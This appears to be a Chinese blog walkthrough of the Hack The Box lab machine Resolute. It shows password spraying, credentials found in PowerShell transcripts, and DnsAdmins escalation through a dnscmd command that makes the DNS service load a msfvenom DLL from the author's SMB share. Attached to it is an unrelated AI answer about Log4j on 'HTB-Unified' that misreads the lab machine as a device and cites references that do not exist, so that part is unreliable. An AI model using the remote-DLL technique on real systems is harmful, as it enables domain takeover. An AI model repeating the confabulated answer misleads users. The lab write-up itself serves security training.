HTB-Resolute

在这里插入图片描述

信息收集

在这里插入图片描述
SMB 445

在这里插入图片描述
netbios-ssn 139
使用空用户连接目标rpc,并从域中枚举用户。
在这里插入图片描述
开始收集信息。
在这里插入图片描述
有一个密码Welcome123!,还有一堆用户名。
在这里插入图片描述

接下来就是暴力跑一遍。将之前nmap扫描出来的389的域名拿来用。

在这里插入图片描述

在这里插入图片描述

立足

通过winrm知道了megabank.local\melanie:Welcome123!是可行的。
在这里插入图片描述

melanie -> ryan

在C盘根目录收集信息的时候发现了几个隐藏文件夹以及文件。
在这里插入图片描述
根目录下的PSTranscripts里面有些有趣的东西。
在这里插入图片描述

在这里插入图片描述在这里插入图片描述

其中有一行。
在这里插入图片描述
使用ryan:Serv3r4Admin4cc123!通过evil-winrm登录。
在这里插入图片描述

提权

在ryan的桌面有一个note.txt文件。内容如下:
在这里插入图片描述 我们需要在1分钟之内完成操作,否则1分钟过后会被重置。想查看时间任务看看能否被用来执行脚本。
在这里插入图片描述
可惜不行,继续收集ryan的更多信息,在搜索到ryan的组的时候发现了一个有趣的分组DnsAdmins。

在这里插入图片描述
我们可以通过让DNS服务器加载远程dll并执行。我们用msfvenom生成一个恶意dll。

本地运行smb服务,smbserver.py出现了一些问题。
在这里插入图片描述
在impacket网站重新git一遍,然后sudo python3 setup.py install。
在这里插入图片描述
就好了。
在这里插入图片描述

使用格式是smbserver.py 共享名字 共享路径,以当前环境为路径,共享名字为rick。
在这里插入图片描述

使用命令获取:dnscmd /config /serverlevelplugindll \\10.10.14.31\rick\adduser.dll

在这里插入图片描述

下一步是让DNS服务重启,没有任何反应,是不是msfvenom生成的dll出现了问题。
在这里插入图片描述
还是说超过1分钟了?提前输入好命令,快速完成。(如果在生产环境中,重启DNS可能会造成糟糕的事情,要特别小心。)
在这里插入图片描述

<think>好的,用户想查找关于HTB-Unified中log4j漏洞的相关信息和解决方案,以及影响范围。首先,我需要确认HTB-Unified是什么。可能是一个硬件设备或软件系统,但根据用户提供的引用内容,之前的引用提到了USB OTG白名单、CacheFiles的延迟信息和内核的tickless特性,这可能与嵌入式系统或Linux内核相关。不过HTB-Unified的具体信息不是很明确,可能需要进一步推测。 接下来,关于Log4j漏洞,特别是Log4Shell(CVE-2021-44228),这是一个广泛影响Apache Log4j 2库的远程代码执行漏洞。用户提到的log4j漏洞可能指的是这个。需要将HTB-Unified与Log4j的使用联系起来。 用户提供的引用中并没有直接提到HTB-Unified或Log4j,所以可能需要依赖外部知识。但根据常规处理流程,修复Log4j漏洞通常包括升级到2.17.1或更高版本,或者应用缓解措施如修改JVM参数或配置Log4j。 影响范围方面,任何使用Log4j 2.x版本到2.14.1的系统都可能受影响,特别是暴露在网络中的应用程序。需要确认HTB-Unified是否使用受影响版本,并是否暴露了相关服务。 用户可能需要联系HTB-Unified的厂商获取官方补丁,或者检查系统内的Log4j版本,应用临时措施如设置log4j2.formatMsgNoLookups为true。 需要确保回答中包含这些步骤,并建议用户查阅官方文档或安全公告。同时,生成相关问题以帮助用户进一步探索,比如如何检测漏洞、临时缓解措施、厂商补丁获取等。</think>关于HTB-Unified设备中Log4j漏洞的修复方案及影响范围,根据Linux内核配置与嵌入式设备安全实践,建议按以下步骤处理: 1. **漏洞确认**: 需确认HTB-Unified是否使用Apache Log4j 2.x版本(2.0-beta9至2.16.0为受影响范围)。可通过设备管理控制台的组件清单或运行`find / -name "log4j-core-*.jar"`命令查找相关文件[^1]。 2. **修复方案**: - 官方升级:优先安装设备厂商提供的安全补丁,通常涉及升级到Log4j 2.17.1+版本 - 紧急缓解措施: ```bash # 修改JVM启动参数(如设备使用Java服务) -Dlog4j2.formatMsgNoLookups=true ``` - 配置文件加固:在log4j2.xml中添加`<PatternLayout disableLookups="true"/>`[^2] 3. **影响范围**: - 高危组件:所有使用JNDI查找功能的网络服务(HTTP API、日志监控接口等) - 潜在风险:通过${jndi:ldap://}注入实现远程代码执行,需特别检查514端口(syslog)、80/443端口(web服务)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值